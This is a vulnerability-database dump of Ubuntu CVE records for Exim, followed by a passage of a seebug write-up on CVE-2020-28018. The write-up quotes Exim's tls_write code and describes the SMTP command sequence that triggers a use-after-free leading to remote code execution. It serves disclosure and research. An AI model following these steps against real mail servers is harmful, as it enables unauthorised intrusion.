"privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28010", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28010"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28010", "href": "https://ubuntu.com/security/CVE-2020-28010", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-09T16:55:03", "description": "Exim 4 before 4.92 allows Integer Overflow to Buffer Overflow, in which an\nunauthenticated remote attacker can execute arbitrary code by leveraging\nthe mishandling of continuation lines during header-length restriction.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28020", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28020"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28020", "href": "https://ubuntu.com/security/CVE-2020-28020", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-09T16:52:52", "description": "Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. The -oP\noption is available to the exim user, and allows a denial of service\nbecause root-owned files can be overwritten.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28014", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 5.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 7.8, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28014"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28014", "href": "https://ubuntu.com/security/CVE-2020-28014", "cvss": {"score": 5.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:C"}}, 
{"lastseen": "2023-08-09T16:52:44", "description": "Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow because\nget_stdinput allows unbounded reads that are accompanied by unbounded\nincreases in a certain size variable. NOTE: exploitation may be impractical\nbecause of the execution time needed to overflow (multiple days).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28009", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28009"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28009", "href": "https://ubuntu.com/security/CVE-2020-28009", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-09T16:52:35", "description": "Exim 4 before 4.94.2 allows Heap-based Buffer Overflow in queue_run via two\nsender options: -R and -S. 
This may cause privilege escalation from exim to\nroot.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28011", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28011"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28011", "href": "https://ubuntu.com/security/CVE-2020-28011", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T13:46:01", "description": "Exim 4 before 4.94.2 allows Use After Free in smtp_reset in certain\nsituations that may be common for builds with OpenSSL.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[leosilva](<https://launchpad.net/~leosilva>) | trusty/xenial ESM not affected code introduced later\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28018", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28018"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28018", "href": "https://ubuntu.com/security/CVE-2020-28018", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-09T16:53:12", "description": "Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because\nExim operates as root in the log directory (owned by a non-root user), a\nsymlink or hard link attack allows overwriting critical root-owned files\nanywhere on the filesystem.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28007", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28007"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28007", "href": "https://ubuntu.com/security/CVE-2020-28007", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-09T16:52:06", "description": "Exim 4 before 4.94.2 allows Buffer Underwrite that may result in\nunauthenticated remote attackers executing arbitrary commands, because\nsmtp_ungetc was only intended to push back characters, but can actually\npush back non-character error codes such as EOF.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28024", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28024"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28024", "href": "https://ubuntu.com/security/CVE-2020-28024", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2023-08-09T16:55:11", "description": "Exim 4 before 4.94.2 allows Exposure of File Descriptor to Unintended\nControl Sphere because rda_interpret uses a privileged pipe that lacks a\nclose-on-exec flag.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28012", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28012"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28012", "href": "https://ubuntu.com/security/CVE-2020-28012", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T13:45:58", "description": "Exim 4 before 4.94.2 allows Out-of-bounds Read. 
smtp_setup_msg may disclose\nsensitive information from process memory to an unauthenticated SMTP\nclient.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[leosilva](<https://launchpad.net/~leosilva>) | trusty/xenial ESM not-affected code not present\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28023", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28023"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28023", "href": "https://ubuntu.com/security/CVE-2020-28023", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-08-09T16:52:52", "description": "Exim 4 before 4.94.2 allows Heap-based Buffer Overflow because it\nmishandles \"-F '.('\" on the command line, and thus may allow privilege\nescalation from any user to root. 
This occurs because of the interpretation\nof negative sizes in strncpy.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28013", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28013"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28013", "href": "https://ubuntu.com/security/CVE-2020-28013", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-09T16:51:41", "description": "Exim 4 before 4.94.2 allows Out-of-bounds Read because\npdkim_finish_bodyhash does not validate the relationship between\nsig->bodyhash.len and b->bh.len; thus, a crafted DKIM-Signature header\nmight lead to a leak of sensitive information from process memory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28025", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28025"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28025", "href": "https://ubuntu.com/security/CVE-2020-28025", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-08-09T16:52:22", "description": "Exim 4 before 4.94.2 has Improper Restriction of Write Operations within\nthe Bounds of a Memory Buffer. 
This occurs when processing name=value pairs\nwithin MAIL FROM and RCPT TO commands.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28022"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28022", "href": "https://ubuntu.com/security/CVE-2020-28022", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-09T16:51:47", "description": "Exim 4 before 4.94.2 has Execution with Unnecessary Privileges. By\nleveraging a delete_pid_file race condition, a local user can delete\narbitrary files as root. 
This involves the -oP and -oPX options.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.3, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2021-27216", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.3, "vectorString": "AV:L/AC:M/Au:N/C:N/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27216"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2021-27216", "href": "https://ubuntu.com/security/CVE-2021-27216", "cvss": {"score": 6.3, "vector": "AV:L/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2023-06-14T14:00:55", "description": "A flaw was found in Exim versions 4.87 to 4.91 (inclusive). 
Improper\nvalidation of recipient address in deliver_message() function in\n/src/deliver.c may lead to remote command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-04T00:00:00", "type": "ubuntucve", "title": "CVE-2019-10149", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-04T00:00:00", "id": "UB:CVE-2019-10149", "href": "https://ubuntu.com/security/CVE-2019-10149", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2021-07-24T10:26:52", "description": "# CVE-2020-28018: Exim Use-after-free (UAF) leading to RCE\n\n## Introduction\n\nThere exists a Use-after-free (UAF) vulnerability in `tls-openssl.c` that allow remote unauthenticated attackers to corrupt internal memory data, thus finally achieving remote code execution.\n\nPrimitives:\n\n- [x] Memory Leakage\n- [x] Arbitrary read primitive\n- [x] Write-What-Where primitive\n\nWith the use of all those primitives chained together it is possible to fully bypass all the available exploit mitigations finally ending up on a remote code execution as the 
exim user.\n\nThis vulnerability has been released among a huge list of vulnerabilities, the official Qualys report chains the Use-After-Free with CVE-2020-28008 to perform a Local Privilege Escalation (LPE) once RCE has been achieved.\n\n## Pre-requisites\n\nThe exim, should be configured / compiled in the following way:\n\n- TLS is enabled\n- OpenSSL is used (instead of GnuTLS)\n- Exim is one of the vulnerable versions\n- `X_PIPE_CONNECT` is disabled\n\nYou can use the `checker.py` script to check if a remote server is on a vulnerable version and has some needed requisites for it to be exploitable.\n\n**[!]** `checker.py` does NOT trigger the vulnerability, just checks for vulnerable version, check if PIPELINING and TLS are enabled. This means this checker does not check for patch, which means that it can generate false positives.\n\n## Vulnerable code\n\nAs we already know, the vulnerability is located at `tls-openssl.c`.\n\n```c\n/*************************************************\n* Write bytes down TLS channel *\n*************************************************/\n\n/*\nArguments:\n ct_ctx client context pointer, or NULL for the one global server context\n buff buffer of data\n len number of bytes\n more\t further data expected soon\n\nReturns: the number of bytes after a successful write,\n -1 after a failed write\n\nUsed by both server-side and client-side TLS.\n*/\n\nint\ntls_write(void * ct_ctx, const uschar *buff, size_t len, BOOL more)\n{\nint outbytes, error, left;\nSSL * ssl = ct_ctx ? ((exim_openssl_client_tls_ctx *)ct_ctx)->ssl : server_ssl;\nstatic gstring * corked = NULL;\n\nDEBUG(D_tls) debug_printf(\"%s(%p, %lu%s)\\n\", __FUNCTION__,\n buff, (unsigned long)len, more ? \", more\" : \"\");\n\n/* Lacking a CORK or MSG_MORE facility (such as GnuTLS has) we copy data when\n\"more\" is notified. This hack is only ok if small amounts are involved AND only\none stream does it, in one context (i.e. no store reset). 
Currently it is used\nfor the responses to the received SMTP MAIL , RCPT, DATA sequence, only. */\n/*XXX + if PIPE_COMMAND, banner & ehlo-resp for smmtp-on-connect. Suspect there's\na store reset there. */\n\nif (!ct_ctx && (more || corked))\n {\n#ifdef EXPERIMENTAL_PIPE_CONNECT\n int save_pool = store_pool;\n store_pool = POOL_PERM;\n#endif\n\n corked = string_catn(corked, buff, len);\n\n#ifdef EXPERIMENTAL_PIPE_CONNECT\n store_pool = save_pool;\n#endif\n\n if (more)\n return len;\n buff = CUS corked->s;\n len = corked->ptr;\n corked = NULL;\n }\n\nfor (left = len; left > 0;)\n {\n DEBUG(D_tls) debug_printf(\"SSL_write(%p, %p, %d)\\n\", ssl, buff, left);\n outbytes = SSL_write(ssl, CS buff, left);\n error = SSL_get_error(ssl, outbytes);\n DEBUG(D_tls) debug_printf(\"outbytes=%d error=%d\\n\", outbytes, error);\n switch (error)\n {\n case SSL_ERROR_SSL:\n ERR_error_string_n(ERR_get_error(), ssl_errstring, sizeof(ssl_errstring));\n log_write(0, LOG_MAIN, \"TLS error (SSL_write): %s\", ssl_errstring);\n return -1;\n\n case SSL_ERROR_NONE:\n left -= outbytes;\n buff += outbytes;\n break;\n\n case SSL_ERROR_ZERO_RETURN:\n log_write(0, LOG_MAIN, \"SSL channel closed on write\");\n return -1;\n\n case SSL_ERROR_SYSCALL:\n log_write(0, LOG_MAIN, \"SSL_write: (from %s) syscall: %s\",\n\tsender_fullhost ? 
sender_fullhost : US\"<unknown>\",\n\tstrerror(errno));\n return -1;\n\n default:\n log_write(0, LOG_MAIN, \"SSL_write error %d\", error);\n return -1;\n }\n }\nreturn len;\n}\n```\n\n`smtp_setup_msg()` is the main function that reads the message from the client.\n\nIn specific situations, `smtp_reset()` is called, which cleans up all the buffers\nand values.\n\nThis can happen in situations like:\n\n- `HELO`/`EHLO` is received\n- `STARTTLS` is received\n- `RSET` is received\n- At the start of `smtp_setup_msg()`\n\n\nAt the end of `smtp_reset()`, a call to `store_reset()` is performed.\n\n`store_reset` is a macro wrapping the `store_reset_3()` function.\n\nThe store functions are the functions that manage Exim's dynamic memory.\n\nExim uses a pool allocator on top of blocks obtained from `malloc()`.\n\nThere is also an interesting piece of functionality: a growable string\nimplementation.\n\n`gstring` struct:\n\n```c\ntypedef struct gstring {\n int size; /* Current capacity of string memory */\n int ptr; /* Offset at which to append further chars */\n uschar * s; /* The string memory */\n} gstring;\n```\n\nWhen more space is needed to concatenate a new string, it calls `gstring_grow()`.\n\nThat function first calls `store_extend_3()`, which tries to extend the memory\nwithin the same pool block.\n\nThis is useful when the length of the input is not known, but if more memory was allocated after\nit, the block cannot be extended in place.\n\nIn that case `gstring_grow()` calls `store_newblock_3()`, which returns new memory and copies the\nbytes already present in the old block into the new one.\n\nThen the `g->s` pointer is updated from `gstring_catn()`.\n\nIn the function `tls_write()`, we can see there is a `BOOL` argument called `more`.\n\nIt indicates whether more data is expected to be copied into the string buffer before\nthe buffered data is returned to the user.\n\nIf so, the `corked` pointer is not NULL'ed.\n\nIf not, then the data contained in the string buffer 
is returned to the user.\n\nThis functionality opens some interesting ways to trigger a Use-After-Free.\n\nFirst, the pointer to the `gstring` struct is stored in a static variable,\nwhich means that on future calls to `tls_write()` we will be able to use it.\n\nHow can we free the buffer and then still be able to use it?\n\nWe need to make `smtp_setup_msg()` call `smtp_reset()` while one\nof our buffers is still referenced by `server_corked` (not NULL'ed).\n\nAfter the reset, if we somehow call `tls_write()`, the pointer will\nstill be there, thus allowing us to use it after the memory has been freed.\n\n`smtp_reset()` frees all the memory of `POOL_MAIN`, in which our buffer is contained.\n\n\n## Triggering Use-After-Free\n\nTo control the Use-After-Free we first need to initialize a new connection.\n\nAs we want to exploit `tls_write()`, we first need to start a new TLS session.\n\nSo first we send an `EHLO` command, followed by a `STARTTLS` to start the TLS connection.\n\nThen, to make `more` be `1`, we pipeline a command, and the final one will be half of a `NOOP`.\n\nWe close the TLS connection and send the rest of the `NOOP` command.\n\nWe now send `EHLO` again, which will make `smtp_reset` be called and free our buffer.\n\nNow we need to start another TLS connection to be able to use `tls_write()` again.\n\nWe send `STARTTLS`.\n\nNow sending any command to the server will end up calling `tls_write()` to return a response.\n\nBut... 
